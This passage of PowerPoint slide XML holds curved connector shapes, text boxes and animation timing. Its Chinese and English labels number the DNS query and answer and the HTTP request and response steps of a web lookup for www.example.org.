              <a:gd name="T10" fmla="*/ 0 h 1091821"/>
              <a:gd name="T11" fmla="*/ 2797791 w 2797791"/>
              <a:gd name="T12" fmla="*/ 1091821 h 1091821"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="2797791" h="1091821">
                <a:moveTo>
                  <a:pt x="0" y="1091821"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="653955" y="1053152"/>
                  <a:pt x="1307911" y="1014484"/>
                  <a:pt x="1774209" y="832514"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2240508" y="650544"/>
                  <a:pt x="2634018" y="181970"/>
                  <a:pt x="2797791" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>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1" name="Freeform 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4518025" y="3206750"/>
            <a:ext cx="2619375" cy="1243013"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2611424 w 2620370"/>
              <a:gd name="T1" fmla="*/ 0 h 1241946"/>
              <a:gd name="T2" fmla="*/ 1305715 w 2620370"/>
              <a:gd name="T3" fmla="*/ 467624 h 1241946"/>
              <a:gd name="T4" fmla="*/ 0 w 2620370"/>
              <a:gd name="T5" fmla="*/ 1251583 h 1241946"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 2620370"/>
              <a:gd name="T10" fmla="*/ 0 h 1241946"/>
              <a:gd name="T11" fmla="*/ 2620370 w 2620370"/>
              <a:gd name="T12" fmla="*/ 1241946 h 1241946"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="2620370" h="1241946">
                <a:moveTo>
                  <a:pt x="2620370" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2183641" y="128516"/>
                  <a:pt x="1746913" y="257033"/>
                  <a:pt x="1310185" y="464024"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="873457" y="671015"/>
                  <a:pt x="436728" y="956480"/>
                  <a:pt x="0" y="1241946"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>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2" name="Freeform 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1979613" y="3500438"/>
            <a:ext cx="1924050" cy="1084262"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 999825 w 2088108"/>
              <a:gd name="T1" fmla="*/ 1134229 h 1078173"/>
              <a:gd name="T2" fmla="*/ 490110 w 2088108"/>
              <a:gd name="T3" fmla="*/ 430718 h 1078173"/>
              <a:gd name="T4" fmla="*/ 0 w 2088108"/>
              <a:gd name="T5" fmla="*/ 0 h 1078173"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 2088108"/>
              <a:gd name="T10" fmla="*/ 0 h 1078173"/>
              <a:gd name="T11" fmla="*/ 2088108 w 2088108"/>
              <a:gd name="T12" fmla="*/ 1078173 h 1078173"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="2088108" h="1078173">
                <a:moveTo>
                  <a:pt x="2088108" y="1078173"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1729854" y="833650"/>
                  <a:pt x="1371600" y="589128"/>
                  <a:pt x="1023582" y="409432"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="675564" y="229737"/>
                  <a:pt x="337782" y="114868"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="9525">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3" name="Freeform 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="2565400"/>
            <a:ext cx="2538413" cy="628650"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2538484"/>
              <a:gd name="T1" fmla="*/ 635515 h 627797"/>
              <a:gd name="T2" fmla="*/ 1241631 w 2538484"/>
              <a:gd name="T3" fmla="*/ 400651 h 627797"/>
              <a:gd name="T4" fmla="*/ 2537838 w 2538484"/>
              <a:gd name="T5" fmla="*/ 0 h 627797"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 2538484"/>
              <a:gd name="T10" fmla="*/ 0 h 627797"/>
              <a:gd name="T11" fmla="*/ 2538484 w 2538484"/>
              <a:gd name="T12" fmla="*/ 627797 h 627797"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="2538484" h="627797">
                <a:moveTo>
                  <a:pt x="0" y="627797"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="409432" y="564107"/>
                  <a:pt x="818865" y="500418"/>
                  <a:pt x="1241946" y="395785"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1665027" y="291152"/>
                  <a:pt x="2536209" y="72788"/>
                  <a:pt x="2538484" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="9525">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4" name="Freeform 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1733550" y="2254250"/>
            <a:ext cx="2593975" cy="666750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2601191 w 2593074"/>
              <a:gd name="T1" fmla="*/ 25119 h 666465"/>
              <a:gd name="T2" fmla="*/ 1245836 w 2593074"/>
              <a:gd name="T3" fmla="*/ 107321 h 666465"/>
              <a:gd name="T4" fmla="*/ 0 w 2593074"/>
              <a:gd name="T5" fmla="*/ 669034 h 666465"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 2593074"/>
              <a:gd name="T10" fmla="*/ 0 h 666465"/>
              <a:gd name="T11" fmla="*/ 2593074 w 2593074"/>
              <a:gd name="T12" fmla="*/ 666465 h 666465"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="2593074" h="666465">
                <a:moveTo>
                  <a:pt x="2593074" y="25020"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2133599" y="12510"/>
                  <a:pt x="1674125" y="0"/>
                  <a:pt x="1241946" y="106907"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="809767" y="213814"/>
                  <a:pt x="179695" y="577755"/>
                  <a:pt x="0" y="666465"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="9525">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8145" name="TextBox 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1187450" y="4652963"/>
            <a:ext cx="2066925" cy="58578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 DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>查询</a:t>
            </a:r>
            <a:endParaRPr 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www.example.org?</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48146" name="TextBox 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5364163" y="4581525"/>
            <a:ext cx="2065337"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DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>查询</a:t>
            </a:r>
            <a:endParaRPr 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www.example.org?</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48147" name="TextBox 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5254625" y="3500438"/>
            <a:ext cx="1420813" cy="58578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③ DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>应答</a:t>
            </a:r>
            <a:endParaRPr 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192.0.32.10</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48148" name="TextBox 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2411413" y="3644900"/>
            <a:ext cx="1420812"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④ DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>应答</a:t>
            </a:r>
            <a:endParaRPr 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192.0.32.10</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48149" name="TextBox 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2411413" y="2852738"/>
            <a:ext cx="1325562" cy="33813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⑤HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>请求</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8150" name="TextBox 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2339975" y="2133600"/>
            <a:ext cx="1323975" cy="33813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⑥HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>应答</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48131"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48131"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48131"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="10" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="48133"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48133"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48133"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48133"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="15" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="48134"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48134"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48134"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48134"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="20" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="48132"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48132"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48132"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48132"/>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48138"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48138"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48138"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4813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8136"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48136"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48136"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48136"/>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8137"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48137"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48137"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48137"/>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48135"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48135"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48135"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4813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8139"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48139"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
